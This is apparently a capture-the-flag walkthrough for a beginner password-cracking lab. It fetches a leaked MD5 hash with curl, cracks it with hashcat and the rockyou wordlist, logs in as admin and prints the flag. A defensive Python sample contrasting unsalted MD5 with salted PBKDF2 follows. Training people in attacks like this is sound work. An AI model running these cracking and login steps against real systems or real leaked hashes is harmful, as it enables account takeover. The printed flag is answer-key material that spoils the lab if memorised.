hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Vault — Password Cracking

Password Attacks · Password Cracking
Difficulty: Beginner
Vuln class: Password Cracking
Steps: 3
// Objective
Crack a password hash from the leaked database using a wordlist attack with hashcat.
// Tools required
hashcat, rockyou.txt, curl
// Step-by-step walkthrough
1. Retrieve the leaked hash
Access the /leak endpoint to get the admin's password hash from the "leaked" database dump.
Command / Input
curl http://TARGET/leak
Output
{"username":"admin","hash":"5f4dcc3b5aa765d61d8327deb882cf99"}
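This is an MD5 hash, recognizable by its 32-character hex format. Other 128-bit hashes such as NTLM share that length, so the successful crack in the next step is what confirms the guess.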
2. Crack with hashcat
Run hashcat with the rockyou wordlist against the MD5 hash.
Command / Input
hashcat -m 0 5f4dcc3b5aa765d61d8327deb882cf99 /usr/share/wordlists/rockyou.txt
Output
5f4dcc3b5aa765d61d8327deb882cf99:password
The hash cracks to "password", one of the most common passwords in rockyou.
3. Log in and get the flag
Use the cracked password to log in as admin.
Command / Input
curl -X POST http://TARGET/login -d '{"username":"admin","password":"password"}'
Output
{"flag":"HackrGG{v4ult_cr4ck3d_w3ak_p4ss}"}
// Flag
Flag value
HackrGG{v4ult_cr4ck3d_w3ak_p4ss}
Returned on successful admin login after cracking the MD5 hash.
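
Why the hash in step 2 falls to a wordlist, shown beside a hardened storage scheme. This is an added example, not part of the original walkthrough or the lab's code; the function names, the four-entry sample wordlist and the PBKDF2 parameters are assumptions made for illustration.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

LEAKED_MD5 = "5f4dcc3b5aa765d61d8327deb882cf99"  # from the /leak output above
SAMPLE_WORDLIST = ["123456", "letmein", "password", "qwerty"]  # constructed
PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune for your hardware


def md5_hex(password: str) -> str:
    """Weak scheme used by the lab: unsalted MD5, identical for every user."""
    return hashlib.md5(password.encode()).hexdigest()


def audit_md5(stored_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the wordlist entry whose MD5 equals the stored hash, else None."""
    target = stored_hex.lower()
    for candidate in wordlist:
        if md5_hex(candidate) == target:
            return candidate
    return None


def hash_password(password: str) -> str:
    """Hardened scheme: random per-user salt plus a deliberately slow KDF."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    print("unsalted MD5 recovered from wordlist:", audit_md5(LEAKED_MD5, SAMPLE_WORDLIST))
    a, b = hash_password("password"), hash_password("password")
    print("same password, distinct records:", a != b)
    print("verify correct / wrong:", verify_password("password", a), verify_password("qwerty", a))
```

A weak password remains guessable under the hardened scheme; the salt and work factor raise the cost per guess and per account, so pair it with a policy that rejects wordlist entries at registration.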